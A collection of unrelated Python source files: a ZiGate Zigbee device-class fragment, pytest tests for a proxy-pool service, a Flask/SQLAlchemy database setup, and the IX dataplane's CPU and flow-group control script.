extended_info=False):
if endpoint_id in self.endpoints:
endpoint = self.endpoints[endpoint_id]
if cluster_id in endpoint['clusters']:
cluster = endpoint['clusters'][cluster_id]
attribute = cluster.get_attribute(attribute_id)
if extended_info:
attr = {'endpoint': endpoint_id,
'cluster': cluster_id,
'addr': self.addr}
attr.update(attribute)
return attr
return attribute
@property
def attributes(self):
'''
list all attributes including endpoint and cluster id
'''
return self.get_attributes(True)
def get_attributes(self, extended_info=False):
'''
list all attributes
including endpoint and cluster id
'''
attrs = []
endpoints = list(self.endpoints.keys())
endpoints.sort()
for endpoint_id in endpoints:
endpoint = self.endpoints[endpoint_id]
for cluster_id, cluster in endpoint.get('clusters', {}).items():
for attribute in cluster.attributes.values():
if extended_info:
attr = {'endpoint': endpoint_id, 'cluster': cluster_id}
attr.update(attribute)
attrs.append(attr)
else:
attrs.append(attribute)
return attrs
def set_attributes(self, attributes):
'''
load list created by attributes()
'''
for attribute in attributes:
endpoint_id = attribute.pop('endpoint')
cluster_id = attribute.pop('cluster')
self.set_attribute(endpoint_id, cluster_id, attribute)
def get_property(self, name, extended_info=False):
'''
return attribute matching name
'''
for endpoint_id, endpoint in self.endpoints.items():
for cluster_id, cluster in endpoint.get('clusters', {}).items():
for attribute in cluster.attributes.values():
if attribute.get('name') == name:
if extended_info:
attr = {'endpoint': endpoint_id,
'cluster': cluster_id}
attr.update(attribute)
return attr
return attribute
def get_property_value(self, name, default=None):
'''
return attribute value matching name
'''
prop = self.get_property(name)
if prop:
return prop.get('value', default)
return default
def get_value(self, name, default=None):
'''
return attribute value matching name
shorter alias of get_property_value
'''
return self.get_property_value(name, default)
@property
def properties(self):
'''
return well known attribute list
attribute with friendly name
'''
props = []
for endpoint in self.endpoints.values():
for cluster in endpoint.get('clusters', {}).values():
for attribute in cluster.attributes.values():
if 'name' in attribute:
props.append(attribute)
return props
def receiver_on_when_idle(self):
mac_capability = self.info.get('mac_capability')
if mac_capability:
return mac_capability[-3] == '1'
return False
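    # Sketch: if info['mac_capability'] held the bit string '10001110' (an
    # assumed storage format), the check above reads the third character from
    # the end ('1' here) and the device would count as always listening.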
def need_discovery(self):
'''
        return True if the device needs to be discovered
        because important information is missing
'''
need = False
LOGGER.debug('Check Need discovery %s', self)
if not self.discovery:
self.load_template()
if not self.get_property_value('type'):
LOGGER.debug('Need discovery : no type')
need = True
if not self.ieee:
LOGGER.debug('Need discovery : no IEEE')
need = True
if not self.endpoints:
LOGGER.debug('Need discovery : no endpoints')
need = True
for endpoint in self.endpoints.values():
if endpoint.get('device') is None:
LOGGER.debug('Need discovery : no device id')
need = True
if endpoint.get('in_clusters') is None:
LOGGER.debug('Need discovery : no clusters list')
need = True
return need
def _avoid_duplicate(self):
'''
Rename attribute if needed to avoid duplicate
'''
properties = []
for attribute in self.attributes:
if 'name' not in attribute:
continue
if attribute['name'] in properties:
attribute['name'] = '{}{}'.format(attribute['name'],
attribute['endpoint'])
attr = self.get_attribute(attribute['endpoint'],
attribute['cluster'],
attribute['attribute'])
attr['name'] = attribute['name']
properties.append(attribute['name'])
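    # Example of the renaming above (illustrative): if endpoints 1 and 2 both
    # expose an attribute named 'temperature', the second occurrence is renamed
    # 'temperature2' (name + endpoint id) so both stay addressable as properties.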
def has_template(self):
typ = self.get_type()
if not typ:
LOGGER.warning('No type (modelIdentifier) for device %s', self.addr)
return
typ = typ.replace(' ', '_')
path = os.path.join(BASE_PATH, 'templates', typ + '.json')
return os.path.exists(path)
def load_template(self):
typ = self.get_type()
if not typ:
LOGGER.warning('No type (modelIdentifier) for device %s', self.addr)
return
typ = typ.replace(' ', '_')
path = os.path.join(BASE_PATH, 'templates', typ + '.json')
success = False
if os.path.exists(path):
try:
with open(path) as fp:
template = json.load(fp)
device = Device.from_json(template)
self.update(device)
success = True
except Exception:
LOGGER.error('Failed to load template for %s', typ)
LOGGER.error(traceback.format_exc())
else:
LOGGER.debug('No template found for %s', typ)
if self.need_report:
self._bind_report()
if success:
self.discovery = 'templated'
dispatch_signal(ZIGATE_DEVICE_UPDATED,
self._zigate, **{'zigate': self._zigate,
'device': self})
return success
def generate_template(self, dirname='~'):
'''
Generate template file
'''
typ = self.get_type()
if not typ:
LOGGER.warning('No type (modelIdentifier) for device %s', self.addr)
return
typ = typ.replace(' ', '_')
dirname = os.path.expanduser(dirname)
path = os.path.join(dirname, typ + '.json')
jdata = json.dumps(self, cls=DeviceEncoder)
jdata = json.loads(jdata)
del jdata['addr']
del jdata['discovery']
for key in ('id', 'addr', 'ieee', 'lqi', 'last_seen', 'max_rx', 'max_tx', 'max_buffer'):
if key in jdata['info']:
del jdata['info'][key]
for endpoint in jdata.get('endpoints', []):
for cluster in endpoint.get('clusters', []):
cluster_id = cluster['cluster']
if cluster_id == 0: # we only keep attribute 4, 5, 7 for cluster 0x0000
cluster['attributes'] = [a for a in cluster.get('attributes', [])
if a.get('attribute') in (4, 5, 7)]
for attribute in cluster.get('attributes', []):
keys = list(attribute.keys())
for key in keys:
if key in ('attribute', 'inverse'):
continue
if key == 'data' and cluster_id == 0:
continue
del attribute[key]
with open(path, 'w') as fp:
json.dump(jdata, fp, cls=DeviceEncoder,
sort_keys=True, indent=4, separators=(',', ': '))
@property
def need_report(self):
return self.info.get('need_report', True)
def set_assumed_state(self, assumed_state=True):
self.info['assumed_state'] = assumed_state
@property
def assumed_state(self):
'''
return True if it has assumed state
'''
return self.info.get('assumed_state', False)
@property
def groups(self):
'''
return groups
'''
return self._zigate.get_group_for_addr(self.addr)
|
test_pooler.py
|
import asyncio
import os
import signal
import ssl
from multiprocessing import Process
from random import randint
from time import sleep
from unittest.mock import Mock
import aiohttp
import pytest
import requests
from proxypooler import config
from proxypooler.pooler import ProxyPooler
from proxypooler.ext import serial, deserial
srv = pytest.mark.skipif(
not pytest.config.getoption("--runsrv"),
reason="need --runsrv option to run"
)
if config.ssl_on:
HOST = 'https://localhost:8090'
else:
HOST = 'http://localhost:8090'
MAXSIZE = 10**5
@pytest.fixture
def clear(conn):
yield
conn.get_list(MAXSIZE)
@pytest.fixture
def ssl_context():
if config.ssl_on:
# context = ssl.SSLContext()
# context.load_cert_chain(CERT, KEY)
# context.load_verify_locations(CA_CRT)
# context.verify_mode = ssl.CERT_REQUIRED
# return context
return ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH,
cafile=config.ca_crt)
else:
return None
@pytest.fixture(scope='function')
def pooler(conn, clear):
p = ProxyPooler(saver=conn)
proc = Process(target=p.start)
yield p, proc
os.kill(proc.pid, signal.SIGINT)
proc.join()
@pytest.fixture
def proxy(pooler):
def send_request():
host = 'http://localhost:8088'
count = requests.get('{}/proxies/count'.format(host)).json()['count']
proxy = requests.get('{}/proxies/{}'.format(host, count)).json()['proxies']
return count, proxy
proxy = ["123.163.166.209:808", "175.155.24.9:808", "119.5.1.5:808",
"115.220.150.191:808", "117.43.0.73:808", "166.111.77.32:80",
"111.13.7.121:80", "125.106.248.222:808", "111.13.2.131:80",
"111.13.7.117:80", "119.5.1.35:808", "124.207.82.166:8008",
"121.69.47.126:8080", "123.125.212.171:8080", "36.249.24.157:808",
"121.232.147.114:9000", "144.12.165.38:808", "218.64.93.47:808",
"117.69.7.173:808", "221.229.46.39:808", "113.58.235.73:808",
"182.39.1.200:808", "58.50.64.15:808", "220.113.26.18:8080",
"117.43.1.187:808", "125.106.249.228:808", "58.253.70.149:8080",
"202.108.2.42:80", "106.0.4.116:8081", "175.155.24.22:808",
"123.55.189.10:808", "111.13.7.42:83", "121.237.143.107:808",
"175.155.25.21:808", "119.5.1.44:808", "27.22.49.236:808",
"221.217.34.54:9000", "60.184.174.109:808", "60.184.173.100:808",
"59.56.46.133:808", "101.4.136.34:80", "121.204.102.98:808",
"113.226.65.175:80", "61.178.238.122:63000", "115.220.146.70:808",
"122.241.72.204:808", "175.155.24.2:808", "113.123.127.230:808",
"125.106.224.213:808", "117.43.1.246:808", "119.5.1.33:808",
"119.5.0.4:808", "119.5.0.70:808", "175.155.25.44:808",
"123.55.189.200:808", "180.118.241.227:808", "218.241.234.48:8080",
"175.155.25.28:808", "123.163.130.15:808", "119.5.0.22:808"]
proxy = ["127.0.0.1:{}".format(i+51234) for i in range(300)]
count = len(proxy)
count_proxy = Mock(return_value=(count, proxy))
send_request = count_proxy
count, proxy = send_request()
p, proc = pooler
max_expire = 10
for i in proxy:
p.put(i, randint(2, max_expire))
return p, proc, count
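# Note (inferred from the assertions in test_api below, not stated elsewhere in
# this file): the pool appears to order items by ascending expire value, so
# get() returns the entry with the smallest expire first and rev=True walks the
# queue from the largest expire down.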
def test_api(conn):
p = ProxyPooler(saver=conn)
for i in range(10):
p.put('127.0.0.1:{}'.format(80+i), i+2)
p.put_list([('127.0.0.1:{}'.format(80+i), i+2) for i in range(10, 20)])
assert p.size == 20
item, expire = p.get()
assert item == '127.0.0.1:80'
p.put('127.0.0.1:100', 1)
item, expire = p._get_item()
assert item['item'] == '127.0.0.1:100'
assert item['expire'] == 1
p._put_item(item, expire)
item, expire = p.get()
assert item == '127.0.0.1:100'
assert expire == 1
items = [p._get_item() for _ in range(10)]
p._put_items(items)
assert p.size == 19
item, expire = p.get()
assert item == '127.0.0.1:81'
item, expire = p._get_item()
assert item['item'] == '127.0.0.1:82'
assert item['expire'] == 4
items = p.get_list(3)
assert len(items) == 3
assert items[0][0] == '127.0.0.1:83'
assert items[0][1] == 5
assert items[1][1] == 6
items, _ = p._get_items(5)
assert len(items) == 5
assert items[0][0]['item'] == '127.0.0.1:86'
assert p.size == 9
items = p.get_list(1)
assert len(items) == 1
assert items[0][0] == '127.0.0.1:91'
items = p.get_list(0)
assert not items
items = p.get_list(-2)
assert not items
items, _ = p._get_items(1)
assert len(items) == 1
assert items[0][0]['item'] == '127.0.0.1:92'
items, _ = p._get_items(0)
assert not items
items = p.get_list(20, rev=True)
assert len(items) == 7
assert items[0][0] == '127.0.0.1:99'
assert p.size == 0
item, expire = p.get()
assert item is None
items, _ = p._get_items(1)
assert not items
def test_connect(pooler, ssl_context):
def client_send(data, queue, ssl_context):
async def _client():
connector = aiohttp.TCPConnector(ssl_context=ssl_context)
session = aiohttp.ClientSession(connector=connector)
async with session.ws_connect('{}/connect'.format(HOST)) as ws:
if isinstance(data, str):
await ws.send_str(data)
elif isinstance(data, bytes):
await ws.send_bytes(data)
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close cmd':
await ws.close()
break
elif msg.type == aiohttp.WSMsgType.BINARY:
items = deserial(msg.data)
queue.put_nowait(items)
break
elif (msg.type == aiohttp.WSMsgType.CLOSED or
msg.type == aiohttp.WSMsgType.ERROR):
break
loop = asyncio.get_event_loop()
loop.run_until_complete(_client())
p, proc = pooler
proc.start()
sleep(1) # wait server start
queue = asyncio.Queue()
client_send(serial([('127.0.0.1:2017', 20)]), queue, ssl_context)
assert p.size == 1
client_send(serial([('127.0.0.1:2018', 40)]), queue, ssl_context)
client_send('get', queue, ssl_context)
assert queue.get_nowait()[0] == ('127.0.0.1:2018', 40)
client_send(serial([('127.0.0.1:2018', 30), ('127.0.0.1:2019', 25),
('127.0.0.1:2020', 20)]), queue, ssl_context)
client_send('get 0', queue, ssl_context)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
assert p.size == 4
client_send('get proxy', queue, ssl_context)
assert p.size == 4
client_send('get 3', queue, ssl_context)
assert queue.get_nowait() == (('127.0.0.1:2018', 30), ('127.0.0.1:2019', 25), ('127.0.0.1:2020', 20))
client_send('get 1', queue, ssl_context)
assert queue.get_nowait() == (('127.0.0.1:2017', 20),)
assert p.size == 0
@srv
def test_server(monkeypatch, proxy, celery_worker):
p, proc, count = proxy
assert p.size == count
proc.start()
    proc.join(10 + 5)  # roughly count / VALIDATE_COUNT * max_expire seconds
assert p.size == 0
|
extensions.py
|
import sqlalchemy
from flask_sqlalchemy import SQLAlchemy
from config import *
from sqlalchemy.orm import sessionmaker, scoped_session
import os
# url = 'mysql+pymysql://{0}:{1}@{2}'.format(USER, PASSWORD, HOST)
url = os.getenv("DB_URL")
engine = sqlalchemy.create_engine(url) # connect to server
engine.execute("CREATE SCHEMA IF NOT EXISTS `{0}`;".format(os.getenv("SCHEMA"))) # create 'ase' schema if it does not exist
engine.execute("USE {0};".format(os.getenv("SCHEMA"))) # select new 'ase' schema
db = SQLAlchemy()
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
# from sqlalchemy.orm import scoped_session
# import threading
# from models import *
# from extensions import db, Session
#
# def run():
# threading.Thread(target=task).start()
# print("The main run function has returned")
# return
#
# def task():
# print(f"Task has started on {threading.current_thread().name}")
# sess = Session()
# print(f"Example query of users: {sess.query(User).filter_by(username='cs').first()}")
# print("Task has ended")
# Session.remove()
|
ixcp.py
|
#!/usr/bin/env python
# Copyright 2013-16 Board of Trustees of Stanford University
# Copyright 2013-16 Ecole Polytechnique Federale Lausanne (EPFL)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import argparse
import ctypes
import glob
import mmap
import os
import os.path
import posix_ipc
import struct
import subprocess
import sys
import time
import threading
BITS_PER_LONG = 64
NCPU = 128
ETH_MAX_NUM_FG = 128
NETHDEV = 16
ETH_MAX_TOTAL_FG = ETH_MAX_NUM_FG * NETHDEV
IDLE_FIFO_SIZE = 256
class CpuMetrics(ctypes.Structure):
_fields_ = [
('queuing_delay', ctypes.c_double),
('batch_size', ctypes.c_double),
('queue_size', ctypes.c_double * 3),
('loop_duration', ctypes.c_long),
('idle', ctypes.c_double * 3),
('padding', ctypes.c_byte * 56),
]
class FlowGroupMetrics(ctypes.Structure):
_fields_ = [
('cpu', ctypes.c_uint),
('padding', ctypes.c_byte * 60),
]
class CmdParamsMigrate(ctypes.Structure):
_fields_ = [
('fg_bitmap', ctypes.c_ulong * (ETH_MAX_TOTAL_FG / BITS_PER_LONG)),
('cpu', ctypes.c_uint),
]
class CmdParamsIdle(ctypes.Structure):
_fields_ = [
('fifo', ctypes.c_char * IDLE_FIFO_SIZE),
]
class CommandParameters(ctypes.Union):
_fields_ = [
('migrate', CmdParamsMigrate),
('idle', CmdParamsIdle),
]
class Command(ctypes.Structure):
CP_CMD_NOP = 0
CP_CMD_MIGRATE = 1
CP_CMD_IDLE = 2
CP_STATUS_READY = 0
CP_STATUS_RUNNING = 1
CP_CPU_STATE_IDLE = 0
CP_CPU_STATE_RUNNING = 1
_fields_ = [
('cpu_state', ctypes.c_uint),
('cmd_id', ctypes.c_uint),
('status', ctypes.c_uint),
('cmd_params', CommandParameters),
('no_idle', ctypes.c_byte),
]
class Scratchpad(ctypes.Structure):
_fields_ = [
('remote_queue_pkts_begin', ctypes.c_long),
('remote_queue_pkts_end', ctypes.c_long),
('local_queue_pkts', ctypes.c_long),
('backlog_before', ctypes.c_long),
('backlog_after', ctypes.c_long),
('timers', ctypes.c_long),
('timer_fired', ctypes.c_long),
('ts_migration_start', ctypes.c_long),
('ts_data_structures_done', ctypes.c_long),
('ts_before_backlog', ctypes.c_long),
('ts_after_backlog', ctypes.c_long),
('ts_migration_end', ctypes.c_long),
('ts_first_pkt_at_prev', ctypes.c_long),
('ts_last_pkt_at_prev', ctypes.c_long),
('ts_first_pkt_at_target', ctypes.c_long),
('ts_last_pkt_at_target', ctypes.c_long),
]
class ShMem(ctypes.Structure):
_fields_ = [
('nr_flow_groups', ctypes.c_uint),
('nr_cpus', ctypes.c_uint),
('pkg_power', ctypes.c_float),
('cpu', ctypes.c_int * NCPU),
('padding', ctypes.c_byte * 52),
('cpu_metrics', CpuMetrics * NCPU),
('flow_group', FlowGroupMetrics * ETH_MAX_TOTAL_FG),
('command', Command * NCPU),
('cycles_per_us', ctypes.c_uint),
('scratchpad_idx', ctypes.c_uint),
('scratchpad', Scratchpad * 1024),
]
def bitmap_create(size, on):
bitmap = [0] * (size / BITS_PER_LONG)
for pos in on:
bitmap[pos / BITS_PER_LONG] |= 1 << (pos % BITS_PER_LONG)
return bitmap
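# Worked example of the packing above (illustrative): with BITS_PER_LONG = 64,
# bitmap_create(ETH_MAX_TOTAL_FG, [0, 1, 65]) sets bits 0 and 1 of word 0
# (value 3) and bit 1 of word 1 (value 2); the remaining words stay 0.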
def migrate(shmem, source_cpu, target_cpu, flow_groups):
cmd = shmem.command[source_cpu]
cmd.no_idle = 1
bitmap = bitmap_create(ETH_MAX_TOTAL_FG, flow_groups)
cmd.cmd_params.migrate.fg_bitmap = (ctypes.c_ulong * len(bitmap))(*bitmap)
cmd.cmd_params.migrate.cpu = target_cpu
cmd.status = Command.CP_STATUS_RUNNING
cmd.cmd_id = Command.CP_CMD_MIGRATE
while cmd.status != Command.CP_STATUS_READY:
pass
cmd.no_idle = 0
def get_fifo(cpu):
return os.path.abspath('block-%d.fifo' % cpu)
def is_idle(cpu):
return os.path.exists(get_fifo(cpu))
def idle(shmem, cpu):
if is_idle(cpu):
return
fifo = get_fifo(cpu)
os.mkfifo(fifo)
cmd = shmem.command[cpu]
assert len(fifo) + 1 < IDLE_FIFO_SIZE, fifo
cmd.cmd_params.idle.fifo = fifo
cmd.status = Command.CP_STATUS_RUNNING
cmd.cmd_id = Command.CP_CMD_IDLE
while cmd.status != Command.CP_STATUS_READY:
pass
def wake_up(shmem, cpu):
if not is_idle(cpu):
return
fifo = get_fifo(cpu)
fd = os.open(fifo, os.O_WRONLY)
os.write(fd, '1')
os.close(fd)
os.remove(fifo)
cmd = shmem.command[cpu]
while cmd.cpu_state != Command.CP_CPU_STATE_RUNNING:
pass
def set_nr_cpus(shmem, fg_per_cpu, cpu_count, verbose = False):
cpus = cpu_lists.ht_interleaved[:cpu_count]
return set_cpus(shmem, fg_per_cpu, cpus, verbose)
def set_cpulist(shmem, fg_per_cpu, cpulist, verbose = False):
reverse_map = {}
for i in xrange(shmem.nr_cpus):
reverse_map[shmem.cpu[i]] = i
cpus = []
for cpu in cpulist:
if cpu in reverse_map:
cpus.append(reverse_map[cpu])
else:
print >>sys.stderr, 'Invalid cpulist'
return
return set_cpus(shmem, fg_per_cpu, cpus, verbose)
def list_runs_to_str(inp):
if len(inp) == 0:
return '0:[]'
runa = min(inp)
runb = min(inp)
ret = []
for i in xrange(min(inp)+1, max(inp)+2):
if i not in inp:
if runa is not None:
if runa == runb:
ret.append('%d' % runa)
else:
ret.append('%d-%d' % (runa, runb))
runa = None
elif runa is None:
runa = i
runb = i
else:
runb = i
return '%d:[%s]' % (len(inp),','.join(ret))
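# Example of the run-length formatting above (illustrative):
# list_runs_to_str([0, 1, 2, 5, 6, 9]) returns '6:[0-2,5-6,9]'.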
def set_cpus(shmem, fg_per_cpu, cpus, verbose = False):
global migration_times
fgs_per_cpu = int(shmem.nr_flow_groups / len(cpus))
one_more_fg = shmem.nr_flow_groups % len(cpus)
def fgs_at(cpu):
fgs = fgs_per_cpu
if cpus.index(cpu) < one_more_fg:
fgs += 1
return fgs
migration_times = []
start = 0
for target_cpu in cpus:
shmem.command[target_cpu].no_idle = 1
wake_up(shmem, target_cpu)
for source_cpu in xrange(NCPU):
if source_cpu == target_cpu:
continue
count = min(fgs_at(target_cpu)-len(fg_per_cpu[target_cpu]), len(fg_per_cpu[source_cpu]))
if source_cpu in cpus:
count = min(count, len(fg_per_cpu[source_cpu])-fgs_at(source_cpu))
if count <= 0:
continue
intersection = set(fg_per_cpu[source_cpu][-count:])
#print 'migrate from %d to %d fgs %r' % (source_cpu, target_cpu, list(intersection))
start_time = time.time()
migrate(shmem, source_cpu, target_cpu, list(intersection))
stop_time = time.time()
#if verbose:
# sys.stdout.write('.')
# sys.stdout.flush()
fg_per_cpu[source_cpu] = list(set(fg_per_cpu[source_cpu]) - intersection)
fg_per_cpu[target_cpu] = list(set(fg_per_cpu[target_cpu]) | intersection)
migration_times.append((stop_time - start_time) * 1000)
shmem.command[target_cpu].no_idle = 0
if verbose:
if len(migration_times) > 0:
print '# migration duration min/avg/max = %f/%f/%f ms (%r)' % (min(migration_times), sum(migration_times)/len(migration_times), max(migration_times), migration_times)
for cpu in xrange(shmem.nr_cpus):
if len(fg_per_cpu[cpu]) == 0:
idle(shmem, cpu)
for cpu in xrange(NCPU):
if len(fg_per_cpu[cpu]) == 0:
continue
print '# CPU %02d: flow groups: %s' % (cpu, list_runs_to_str(fg_per_cpu[cpu]))
STEPS_MODE_ENERGY_EFFICIENCY = 1
STEPS_MODE_BACKGROUND_TASK = 2
STEPS_MODE_MINMAX = 3
f = open('/sys/devices/system/cpu/cpu0/topology/core_siblings_list', 'r')
core_count = len(f.readline().split(',')) / 2
f.close()
def get_steps(mode):
f = open('/sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies', 'r')
frequencies = sorted(map(int, f.readline().split()))
f.close()
cpu_list = cpu_lists.ht_at_the_end
steps = []
if mode == STEPS_MODE_ENERGY_EFFICIENCY:
for cpus in xrange(1, core_count + 1):
steps.append({'cpus': cpu_list[:cpus], 'frequency': frequencies[0]})
for freq in frequencies:
steps.append({'cpus': cpu_list[:core_count * 2], 'frequency': freq})
elif mode == STEPS_MODE_BACKGROUND_TASK:
for cpus in xrange(1, core_count + 1):
steps.append({'cpus': cpu_list[:cpus] + cpu_list[core_count:core_count + cpus], 'frequency': frequencies[-2]})
steps.append({'cpus': cpu_list[:core_count * 2], 'frequency': frequencies[-1]})
elif mode == STEPS_MODE_MINMAX:
steps.append({'cpus': [0], 'frequency': frequencies[0]})
steps.append({'cpus': cpu_list[:core_count * 2], 'frequency': frequencies[-1]})
return steps
def calculate_idle_threshold(steps):
turbo_frequency = max(step['frequency'] for step in steps)
idle_threshold = [2]
for i in xrange(1, len(steps)):
step = steps[i]
prv = steps[i-1]
if len(step['cpus']) == core_count * 2 and len(prv['cpus']) == core_count:
idle_threshold.append(1-1/1.3)
elif len(step['cpus']) != len(prv['cpus']):
idle_threshold.append(1.0/len([1 for cpu in step['cpus'] if cpu < core_count]))
elif step['frequency'] != turbo_frequency:
idle_threshold.append(1.0 * (step['frequency'] - prv['frequency']) / step['frequency'])
else:
idle_threshold.append(0.1)
for i in xrange(len(idle_threshold)):
idle_threshold[i] *= 1.2
return idle_threshold
def control_background_job(args, cpus):
if args.background_cpus is None:
return
bg_threads = max(0, len(args.background_cpus) - cpus)
bg_mask = 0
for i in xrange(bg_threads):
bg_mask |= 1 << args.background_cpus[i]
if args.background_fifo is not None:
fd = os.open(args.background_fifo, os.O_WRONLY)
os.write(fd, '%d\n' % bg_threads)
os.close(fd)
if args.background_pid is not None and bg_mask != 0:
DEVNULL = open(os.devnull, 'wb')
subprocess.check_call(['taskset', '-ap', '%x' % bg_mask, str(args.background_pid)], stdout=DEVNULL)
DEVNULL.close()
print '# bg_task threads=%d mask=%x' % (bg_threads, bg_mask)
STEP_UP = 1
STEP_DOWN = 2
def set_step(shmem, fg_per_cpu, step, dir, args):
global set_step_done
if dir == STEP_UP:
control_background_job(args, len([1 for cpu in step['cpus'] if cpu < core_count]))
for directory in glob.glob('/sys/devices/system/cpu/cpu*/cpufreq/'):
f = open('%s/scaling_governor' % directory, 'w')
f.write('userspace\n')
f.close()
f = open('%s/scaling_setspeed' % directory, 'w')
f.write('%s\n' % step['frequency'])
f.close()
set_cpus(shmem, fg_per_cpu, step['cpus'])
set_step_done = True
if dir == STEP_DOWN:
control_background_job(args, len([1 for cpu in step['cpus'] if cpu < core_count]))
def get_all_metrics(shmem, attr):
ret = []
for cpu in xrange(shmem.nr_cpus):
if shmem.command[cpu].cpu_state == Command.CP_CPU_STATE_RUNNING:
ret.append(getattr(shmem.cpu_metrics[cpu], attr))
return ret
def avg(list):
return sum(list) / len(list)
class CpuLists:
pass
cpu_lists = CpuLists()
def compute_cpu_lists(shmem):
reverse_map = {}
for i in xrange(shmem.nr_cpus):
reverse_map[shmem.cpu[i]] = i
cpu_lists.ht_interleaved = []
cpu_lists.ht_at_the_end = []
later = []
for i in xrange(shmem.nr_cpus):
if i in later:
continue
cpu_lists.ht_interleaved.append(i)
cpu_lists.ht_at_the_end.append(i)
f = open('/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list' % shmem.cpu[i], 'r')
hyperthreads = map(int, f.read().split(','))
f.close()
for cpu in hyperthreads:
if cpu not in reverse_map or reverse_map[cpu] == i:
continue
cpu_lists.ht_interleaved.append(reverse_map[cpu])
later.append(reverse_map[cpu])
cpu_lists.ht_at_the_end.extend(later)
def main():
global set_step_done
global migration_times
shm = posix_ipc.SharedMemory('/ix', 0)
buffer = mmap.mmap(shm.fd, ctypes.sizeof(ShMem), mmap.MAP_SHARED, mmap.PROT_WRITE)
shmem = ShMem.from_buffer(buffer)
fg_per_cpu = {}
for i in xrange(NCPU):
fg_per_cpu[i] = []
for i in xrange(shmem.nr_flow_groups):
cpu = shmem.flow_group[i].cpu
fg_per_cpu[cpu].append(i)
"""
print 'flow group assignments:'
for cpu in xrange(NCPU):
if len(fg_per_cpu[cpu]) == 0:
continue
print ' CPU %02d: flow groups %r' % (cpu, fg_per_cpu[cpu])
print 'commands running at:',
empty = True
for i in xrange(NCPU):
if shmem.command[i].status != Command.CP_STATUS_READY:
print 'CPU %02d,' % i,
empty = False
if empty:
print 'none',
print
"""
parser = argparse.ArgumentParser()
parser.add_argument('--single-cpu', action='store_true')
parser.add_argument('--cpus', type=int)
parser.add_argument('--cpulist', type=str)
parser.add_argument('--idle', type=int)
parser.add_argument('--wake-up', type=int)
parser.add_argument('--show-metrics', action='store_true')
parser.add_argument('--control', type=str, choices=['eff', 'back', 'minmax'])
parser.add_argument('--background-fifo', type=str)
parser.add_argument('--background-pid', type=int)
parser.add_argument('--background-cpus', type=str)
parser.add_argument('--print-power', action='store_true')
args = parser.parse_args()
if args.background_cpus is not None:
args.background_cpus = map(int, args.background_cpus.split(','))
compute_cpu_lists(shmem)
if args.single_cpu:
target_cpu = 0
for cpu in xrange(shmem.nr_cpus):
if cpu == target_cpu:
continue
migrate(shmem, cpu, target_cpu, fg_per_cpu[cpu])
sys.stdout.write('.')
sys.stdout.flush()
print
elif args.cpus is not None:
set_nr_cpus(shmem, fg_per_cpu, args.cpus, verbose = True)
elif args.cpulist is not None:
cpulist = map(int, args.cpulist.split(','))
set_cpulist(shmem, fg_per_cpu, cpulist)
elif args.idle is not None:
idle(shmem, args.idle)
elif args.wake_up is not None:
wake_up(shmem, args.wake_up)
elif args.show_metrics:
for cpu in xrange(shmem.nr_cpus):
print 'CPU %d: queuing delay: %d us, batch size: %d pkts' % (cpu, shmem.cpu_metrics[cpu].queuing_delay, shmem.cpu_metrics[cpu].batch_size)
elif args.control is not None:
if args.control == 'eff':
mode = STEPS_MODE_ENERGY_EFFICIENCY
elif args.control == 'back':
mode = STEPS_MODE_BACKGROUND_TASK
elif args.control == 'minmax':
mode = STEPS_MODE_MINMAX
steps = get_steps(mode)
idle_threshold = calculate_idle_threshold(steps)
curr_step_idx = 0
new_step_idx = curr_step_idx
set_step(shmem, fg_per_cpu, steps[curr_step_idx], STEP_UP, args)
last_up = 0
last_down = 0
printed_done = True
set_step_done = True
migration_times = []
while True:
now = time.time()
print now,
fast_queue_size = max([x[0] for x in get_all_metrics(shmem, 'queue_size')])
slow_queue_size = avg([x[2] for x in get_all_metrics(shmem, 'queue_size')])
idle = avg([x[0] for x in get_all_metrics(shmem, 'idle')])
print fast_queue_size,
print avg([x[1] for x in get_all_metrics(shmem, 'queue_size')]),
print slow_queue_size,
print idle,
print avg([x[1] for x in get_all_metrics(shmem, 'idle')]),
print avg([x[2] for x in get_all_metrics(shmem, 'idle')]),
print avg(get_all_metrics(shmem, 'loop_duration')),
print
if fast_queue_size > 32 and curr_step_idx < len(steps) - 1 and now - last_up >= .2 and now - last_down >= 2:
new_step_idx = curr_step_idx + 1
elif slow_queue_size < 8 and idle > idle_threshold[curr_step_idx] and curr_step_idx > 0 and now - last_up >= 4 and now - last_down >= 4:
new_step_idx = curr_step_idx - 1
new_step_idx = int(new_step_idx)
if set_step_done and not printed_done:
print '# %f control_done' % (now,)
if len(migration_times) > 0:
print '# %f migration duration min/avg/max = %f/%f/%f ms (%r)' % (now, min(migration_times), sum(migration_times)/len(migration_times), max(migration_times), migration_times)
migration_times = []
for i in xrange(scratchpad_idx_prv, shmem.scratchpad_idx):
s = shmem.scratchpad[i]
print '# migration %d remote_queue_pkts_begin %d remote_queue_pkts_end %d local_queue_pkts %d backlog_before %d backlog_after %d timers %d' % (i, s.remote_queue_pkts_begin, s.remote_queue_pkts_end, s.local_queue_pkts, s.backlog_before, s.backlog_after, s.timers),
print ' total %d' % ((s.ts_migration_end - s.ts_migration_start ) / shmem.cycles_per_us),
print ' structs %d' % ((s.ts_data_structures_done - s.ts_migration_start ) / shmem.cycles_per_us),
print ' var1 %d' % ((s.ts_first_pkt_at_target - s.ts_data_structures_done) / shmem.cycles_per_us),
